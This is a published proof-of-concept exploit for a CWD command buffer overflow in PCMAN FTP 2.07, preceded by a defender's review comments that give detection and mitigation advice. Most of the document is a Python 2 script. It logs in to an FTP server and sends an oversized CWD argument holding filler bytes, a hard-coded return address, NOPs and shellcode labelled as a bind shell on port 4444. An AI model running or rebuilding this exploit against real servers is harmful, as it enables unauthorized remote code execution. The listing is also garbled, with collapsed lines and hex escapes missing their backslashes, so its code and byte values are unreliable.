PCMAN FTP 2.07 CWD Buffer Overflow
Posted on 31 January 2014
# Review notes (defender's reading of this listing):
#
# What the script does, as far as the visible code shows: it takes three
# command-line arguments (host, user, password), opens a TCP connection to
# port 21, sends USER and PASS, then sends a single CWD command whose
# argument is `junk + espaddress + nops + shellcode`, reads one response and
# closes the socket.  The payload layout is 2012 filler bytes, a 4-byte
# address (commented as 76BB0659), 10 NOP bytes, then a byte string the
# author labels "BIND SHELL | PORT 4444".  The variable name `espaddress`
# suggests a stack-based overflow with an ESP-relative control transfer,
# but that cannot be confirmed from this listing alone.
#
# The listing is garbled by extraction: the original line breaks and
# indentation have been collapsed, the hex escape sequences have lost their
# escape characters (e.g. 'x41' here is three printable characters, not a
# single byte), and the "#post ftp password" comment is split across two
# physical lines.  As shown, the text does not parse as Python, and the
# byte values should not be treated as authoritative.  The `print`
# statement form indicates Python 2.
#
# Code observations: the `script` name from the argv unpack is unused; no
# timeout is set on the socket, so each `recv(1024)` can block
# indefinitely; the socket is not closed if any call raises; the return
# address is hard-coded for the build named in the header ("Windows 7 sp1
# x64 (english)"), so the PoC is presumably build-specific.
#
# Detection / mitigation takeaways grounded in the visible code: a CWD
# command with an argument of more than 2 KB in one FTP request is a
# simple, high-signal network indicator for this class of bug; per the
# shellcode label, a successful run would leave the FTP server process
# listening on TCP 4444, so an unexpected new listener owned by the FTP
# service is a host-side indicator.  The underlying fix is on the server:
# bound the length of command arguments before copying them into fixed
# buffers, and do not expose PCMAN FTP 2.07 to untrusted networks.
# Exploit Title: PCMAN FTP 2.07 CWD Command Buffer Overflow # Date: Jan 25,2014 # Exploit Author: Mahmod Mahajna (Mahy) # Version: 2.07 # Tested on: Windows 7 sp1 x64 (english) # Email: m.dofo123@gmail.com import socket as s from sys import argv # if(len(argv) != 4): print "USAGE: %s host <user> <password>" % argv[0] exit(1) else: #store command line arguments script,host,fuser,fpass=argv #vars junk = 'x41' * 2012 #overwrite function (CWD) with garbage/junk chars espaddress = 'x59x06xbbx76' # 76BB0659 nops = 'x90' * 10 shellcode = ( # BIND SHELL | PORT 4444 "x31xc9xdbxcdxbbxb3x93x96x9dxb1x56xd9x74x24xf4" "x5ax31x5ax17x83xeaxfcx03x5ax13x51x66x6ax75x1c" "x89x93x86x7ex03x76xb7xacx77xf2xeax60xf3x56x07" "x0bx51x43x9cx79x7ex64x15x37x58x4bxa6xf6x64x07" "x64x99x18x5axb9x79x20x95xccx78x65xc8x3fx28x3e" "x86x92xdcx4bxdax2exddx9bx50x0exa5x9exa7xfbx1f" "xa0xf7x54x14xeaxefxdfx72xcbx0ex33x61x37x58x38" "x51xc3x5bxe8xa8x2cx6axd4x66x13x42xd9x77x53x65" "x02x02xafx95xbfx14x74xe7x1bx91x69x4fxefx01x4a" "x71x3cxd7x19x7dx89x9cx46x62x0cx71xfdx9ex85x74" "xd2x16xddx52xf6x73x85xfbxafxd9x68x04xafx86xd5" "xa0xbbx25x01xd2xe1x21xe6xe8x19xb2x60x7bx69x80" "x2fxd7xe5xa8xb8xf1xf2xcfx92x45x6cx2ex1dxb5xa4" "xf5x49xe5xdexdcxf1x6ex1fxe0x27x20x4fx4ex98x80" "x3fx2ex48x68x2axa1xb7x88x55x6bxcex8fx9bx4fx82" "x67xdex6fx34x2bx57x89x5cxc3x31x01xc9x21x66x9a" "x6ex5ax4cxb6x27xccxd8xd0xf0xf3xd8xf6x52x58x70" "x91x20xb2x45x80x36x9fxedxcbx0ex77x67xa2xddxe6" "x78xefxb6x8bxebx74x47xc2x17x23x10x83xe6x3axf4" "x39x50x95xebxc0x04xdexa8x1exf5xe1x31xd3x41xc6" "x21x2dx49x42x16xe1x1cx1cxc0x47xf7xeexbax11xa4" "xb8x2axe4x86x7ax2dxe9xc2x0cxd1x5bxbbx48xedx53" "x2bx5dx96x8excbxa2x4dx0bxfbxe8xccx3dx94xb4x84" "x7cxf9x46x73x42x04xc5x76x3axf3xd5xf2x3fxbfx51" "xeex4dxd0x37x10xe2xd1x1dx1axcd") sploit = junk+espaddress+nops+shellcode #create socket conn = s.socket(s.AF_INET,s.SOCK_STREAM) #establish connection to server conn.connect((host,21)) #post ftp user conn.send('USER '+fuser+' ') #wait for response uf = conn.recv(1024) #post ftp 
# (the "#post ftp password" comment continues on the next line; the
# extraction split it)
password conn.send('PASS '+fpass+' ') #wait for response pf = conn.recv(1024) #send ftp command with sploit conn.send('CWD '+sploit+' ') cf = conn.recv(1024) #close connection conn.close()
